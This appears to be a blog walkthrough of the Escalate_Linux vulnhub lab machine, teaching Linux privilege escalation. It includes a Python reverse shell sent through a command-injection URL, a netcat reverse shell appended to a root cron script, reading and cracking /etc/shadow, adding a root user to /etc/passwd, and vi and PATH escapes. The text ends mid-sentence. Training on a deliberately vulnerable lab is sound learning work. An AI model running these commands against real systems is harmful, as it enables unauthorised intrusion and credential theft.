Select Page

The escalate_linux walkthrough is the vulnhub machine you need to be doing as a beginner ethical hacker to learn Linux privilege escalation. Escalate_Linux level 1 is a vulnhub virtual machine that boasts 12 different ways to reach root access through leveraging a variety of privilege escalation techniques. It is designed purposefully to showcase different ways to escalate privileges on a Linux host. Overall it is a great exercise due to the variety and scope of the steps needed to fully exploit the machine’s security controls.

Interested in learning Malware Analysis? Read the famous tutorial How to Setup A Malware Analysis Lab At Home In 5 Steps!

Here is an overview of what privilege escalation techniques are used in this tutorial:

  • SUID/GUID Files Exploitation
  • Vim/Nano Escape
  • Crontab Exploitation
  • Weak Passwords Cracking
  • Kernel Exploits
  • Adding New Users to /etc/passwd

Here’s What You Need

  • Escalate_Linux Level 1 Virtual Machine from vulnhub (VirtualBox)
  • Kali Linux Virtual Machine (VirtualBox)

Information Gathering -escalate_linux walkthrough

Start with an nmap scan.

Dirb Running dirb unfortunately does not return anything useful. Upon visiting the exposed endpoints on the apache server there is nothing to go off of at this point.

escalate linux vulnhub walkthrough

Gobuster Running gobuster is like pulling out the big guns. It is a recon tool written in go so you know it is fast since it is compiled. And it turns out that this is the trick to finding interesting endpoints on the web server. These are worth investigating.

I run the following using gobuster. Note that the x flag means to search for the following file extensions, php and html.

gobuster dir -w /usr/share/wordlist/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.18 -x .php,.html
escalate linux vulnhub walkthrough

Web Exploitation

Going off the exposed endpoint on the web server found through using gobuster, 10.0.2.18/shell.php I find there is a command injection vulnerability. This means that I can run commands as a parameter based on the shell present on the web server. So apparently this works

10.0.2.18/shell.php?cmd=ifconfig; ping 10.0.2.18

The reason this is possible is because of the shell.php file. The apache web server is hosting this PHP shell oneliner as shown below.

?php system($_GET['cmd']); echo '/*pass cmd as get parameter*/' ?

Now why is that? Think about it, netcat may not be installed purposefully on the remote machine! But maybe Python is?

escalate linux vulnhub walkthrough
The command cmd=ifconfig; ping 10.0.2.17 works! What else does?
http://10.0.2.18/shell.php?cmd=ifconfig;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.17",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And guess what? Boom! This accomplishes getting a reverse shell back to my Kali machine and it did not use meterpreter.This is important for those preparing for the OSCP exam which prohibits its use significantly.

escalate linux vulnhub walkthrough

The next step is to upgrade to a fully functional shell by using Python’s pty module to spawn a bash shell.

python -c 'import pty; pty.spawn("/bin/bash")'

One of the first objectives is to upload tools to the remote host in order to escalate privileges. The first thing I find out is that I do not have write access to the home directory of user5. I try writing to /var/tmp and it goes off without a hitch.

cd /var/tmp 
wget http://10.0.2.17:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh >> lin-enum-output.txt

AutoRecon – escalate_linux walkthrough

AutoRecon is the premiere automated scanning tool that I use often. As one uses it you come to see the convenience that it offers by organizing the artifacts for each host that you will find. Organization can be become difficult and confusing as a full enumeration and exploitation goes on over multiple hosts.

The report directory contains some auto-generated files and directories that are useful for reporting:
local.txt can be used to store the local.txt flag found on targets.
notes.txt should contain a basic template where you can write notes for each service discovered.
proof.txt can be used to store the proof.txt flag found on targets.

github.com/tib3rius/AutoRecon
escalate linux vulnhub walkthrough
AutoRecon relies on asynchronous subprocesses to automate recon scanning of hosts.
[*] http found on tcp/80.

[*] rpcbind found on tcp/111.

[*] netbios-ssn found on tcp/139.

[*] netbios-ssn found on tcp/445.

[*] nfs_acl found on tcp/2049.

[*] nlockmgr found on tcp/42977.

[*] mountd found on tcp/43747.

[*] mountd found on tcp/44203.

[*] mountd found on tcp/60243.

[*] netbios-ns found on udp/137.

LinEnum – escalate_linux walkthrough

To run LinEnum on the remote machine I start a Python web server by python -m SimpleHTTPServer 8000. Then using wget I grab the file and write it /var/tmp folder.

Kernel Kernel information is shown here. There is most likely a kernel exploit available for this machine.

SUID The output for SUID files is shown here. There are a few interesting items that I will definitely look into as a way to escalate privileges.

escalate_linux walkthrough

RW Permisisons The world-writable files are shown below. These are the files that any authenticated user can read and write to. I can also see that gcc, wget, and netcat are installed. These will be needed for any kernel exploits as well as being useful in transferring files to the machine from Kali.

escalate_linux walkthrough

Crontab The scheduled cron jobs are shown below. There is certainly enough information to warrant attempting to exploit cronjobs here.

NFS Enumeration – escalate_linux walkthrough

I notice there are several mountd services running and an nfs service running. Ultimately these prove to be fruitless in pursuit of a shell.

mount -t nfs 10.0.2.18:/ /mnt/el1/
mount: /mnt/el1: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

This error is solved by installing the right helper utilities with an apt -y install nfs-common.

$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
mount: /mnt: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
$ apt-get install cifs-utils

After installing a wrapper package for NFS on linux I mount the remote NFS share and continue to search for an entry point. This means I have successfully mounted the remote filesystem “/” to my local /mnt directory.

# get the wrapper program
$ sudo apt-get install nfs-common

# mount the remote share
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock

# confirm that the share is mounted locally on /mnt
$ df -k
Filesystem     1K-blocks      Used Available Use% Mounted on
udev             1502808         0   1502808   0% /dev
tmpfs             305092      9584    295508   4% /run
/dev/sda1       79980100  32362584  43511740  43% /
tmpfs            1525452      4080   1521372   1% /dev/shm
tmpfs               5120         0      5120   0% /run/lock
tmpfs            1525452         0   1525452   0% /sys/fs/cgroup
Downloads      244912536 216949828  27962708  89% /media/sf_Downloads
tmpfs             305088        16    305072   1% /run/user/130
tmpfs             305088        44    305044   1% /run/user/0
/dev/sr0           83904     83904         0 100% /media/cdrom0
10.0.2.18:/    226639488   5988480 209068800   3% /mnt

SMB Enumeration – escalate_linux walkthrough

Enum4Linux

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

One of the best things about enum4linux is that it can enumerate the users found in SMB shares which should be active accounts on the machine.

 ==================================================================== 
|    Users on 10.0.2.18 via RID cycling (RIDS: 500-550,1000-1050)    |
============================================================
S-1-22-1-1000 Unix User\user1 (Local User)
S-1-22-1-1001 Unix User\user2 (Local User)
S-1-22-1-1002 Unix User\user3 (Local User)
S-1-22-1-1003 Unix User\user4 (Local User)
S-1-22-1-1004 Unix User\user5 (Local User)
S-1-22-1-1005 Unix User\user6 (Local User)
S-1-22-1-1006 Unix User\user7 (Local User)
S-1-22-1-1007 Unix User\user8 (Local User)

After successfully enumerating some user accounts on the machine I attempt to connect to the shares that I have just enumerated. Ultimately there is nothing to gain from this attempt, so I press forward to more enumeration.

Using smbclient I connect to some of the open shares such as ipc$ and liteshare, but these are not anything remarkable either.

smbclient \\\\10.0.2.18\\ipc$
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> 

Looking for SUID/GUID Files

The first step in Linux privilege escalation is to check for files with the SUID/GUID bit set. This means that the file or files can be run with the permissions of the file(s) owner/group. That means that the Which leads to finding that the file script is executable by my current user.

$ find / -perm -u=s -type f 2>/dev/null  
/home/user5/script
/home/user3/shell

-rwsr-xr-x  1 root  root  8392 Jun  4 15:57 script

Running the file does not appear to lead to anything of consequence so I press on.

escalate linux vulnhub walkthrough
Turns out the file script does not do anything…

Which leads me to try the other interesting file which is shell.

1. Abusing SUID/GUID Files

The first way to escalate privileges to root is simple. Finding this is done by looking through directories naturally for interesting files. But LinEnum has already done that and revealed all the SUID/GUID files. One of them is shell found in a user’s directory. Running it opens a bash shell running as root.

escalate linux vulnhub walkthrough
Running the file shell gives me root! This is the escalate_linux walkthrough root technique #1

2. Exploiting Weak Passwords

With root access I now look to start cracking passwords. To do this I list the usernames with cat /etc/passwd and then list out the passwords with cat /etc/shadow. The final step is to run john on the hashes to crack them locally on my Kali machine. The resulting password to root is 12345.

escalate_linux walkthrough
escalate_linux walkthrough
This is the escalate_linux walkthrough root technique #2

3. Exploit Cronjobs

Notice that the file autoscript.sh is scheduled to run every five minutes. It is owned by root, meaning that it will run with root privileges. This file is also writeable by root of course, which I am. The task then is to create a command that will return a shell and paste it in this file. When the file runs again in five minutes the shell will be running as root. Thereby a root shell is accomplished in this way.

$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.2.17 LPORT=443 -f raw

$ echo 'mkfifo /tmp/znaiyl; nc 10.0.2.17 443 0</tmp/znaiyl | /bin/sh >/tmp/znaiyl 2>&1; rm /tmp/znaiyl' >> autoscript.sh
escalate_linux walkthrough
Take the output of msfvenom and put it in a string literal, pass it by echo.
escalate_linux walkthrough
This is the escalate_linux walkthrough root technique #3

4. Exploiting the /etc/passwd File

In Linux when a new user is created an entry is made in /etc/passwd, /etc/group, and /etc/shadow. The latter contains the encrypted password of the user. In order to abuse this process for escalating privileges one needs write access to /etc/passwd. After inital escalation upon running shell or upon cracking the password of root, this is now possible as root has permission to edit /etc/passwd.

# generate a new password using Openssl
$ openssl passwd guru iamguru

The new user entry will be a complete string of guru:$gurupassword:0:0:/root/root:/bin/bash

escalate_linux walkthrough
This is the escalate_linux walkthrough root technique #4

5. Escaping vim Editor for Priv Esc

The output from LinEnum from initial enumeration reveals that user8 can run vi with root privileges. Notice that this is perfect for escaping vim in order to escalate privileges.

escalate_linux walkthrough
This is the escalate_linux walkthrough root technique #5

To escape from within vim in order to escalate privileges is to run sudo vi and from there to run :!sh to open a root bash shell.

6. Exploiting PATH Variables

Another way to abuse the SUID files in this directory is to abuse script. Since initial enumeration reveals that the file runs with root privileges a new file with the same name can lead to a root shell.

# could do this but
echo 'cat /etc/shadow' >> script
chmod 777 script
./script

The above is possible but instead of overwriting files, this is the non-destructive method to employ instead. The commands shown below will list the contents of /etc/shadow. From there the password can be cracked and I can switch to root.

echo 'cat /etc/shadow' >> ls
chmod 777 ls
export PATH=/var/tmp:$PATH
cd /home/user5
./script
error: